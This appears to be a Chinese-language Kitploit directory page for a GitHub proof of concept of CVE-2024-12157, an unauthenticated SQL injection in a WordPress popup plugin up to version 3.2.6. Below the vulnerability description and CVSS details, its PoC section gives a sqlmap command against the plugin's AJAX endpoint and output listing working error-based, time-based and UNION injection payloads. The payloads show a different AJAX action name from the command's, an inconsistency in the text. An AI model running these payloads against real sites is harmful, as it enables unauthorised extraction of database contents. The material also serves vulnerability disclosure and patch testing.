Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-12157 — Popup – MailChimp、GetResponse 和 ActiveCampaign 集成 <= 3.2.6 - 未认证SQL注入 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2024-12157
漏洞分析漏洞利用Web应用程序漏洞利用
GitHubrandomrobbiebf/cve-2024-12157

CVE-2024-12157

Popup – MailChimp、GetResponse 和 ActiveCampaign 集成 <= 3.2.6 - 未认证SQL注入

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-12157

Popup – MailChimp、GetResponse 和 ActiveCampaign Intergrations <= 3.2.6 - 未认证 SQL 注入

描述

WordPress 的 Popup – MailChimp、GetResponse 和 ActiveCampaign Intergrations 插件在所有版本(最高至 3.2.6,包含 3.2.6)中,由于对用户提供的参数转义不足,并且对现有 SQL 查询缺乏充分的预处理,导致通过 'upc_delete_db_record' AJAX 操作的 'id' 参数存在 SQL 注入漏洞。这使得未认证的攻击者能够向现有查询中附加额外的 SQL 查询,从而提取数据库中的敏感信息。

详情

  • 类型:插件
  • Slug:ultimate-popup-creator
  • 受影响版本:3.2.6
  • CVSS 分数:7.5
  • CVSS 评级:高
  • CVSS 向量:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE:CVE-2024-12157
  • 状态:已关闭

POC

root@kitploit:~
$ python3 sqlmap.py -u 'https://wp-dev.ddev.site:443/wp-admin/admin-ajax.php' --data='action=upc_delete_db_record&id=1' --level=2 --text-only --dbms='MySQL'
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.12.2#dev}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:39:20 /2025-01-07/

[13:39:20] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=33ogp3au423...jskg1243tb'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: action=get_state&id=-4023 OR 1 GROUP BY CONCAT(0x71626a7071,(SELECT (CASE WHEN (5717=5717) THEN 1 ELSE 0 END)),0x716b767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: action=get_state&id=(CASE WHEN (4695=4695) THEN SLEEP(5) ELSE 4695 END)

    Type: UNION query
    Title: MySQL UNION query (random number) - 9 columns
    Payload: action=get_state&id=-4877 UNION ALL SELECT 4325,4325,4325,4325,4325,4325,4325,4325,CONCAT(0x71626a7071,0x766a504d7043656b517443675871505768496c43747a7666764d70506d55785067764e45524f6647,0x716b767071)#
---
[13:39:22] [INFO] testing MySQL
下载工具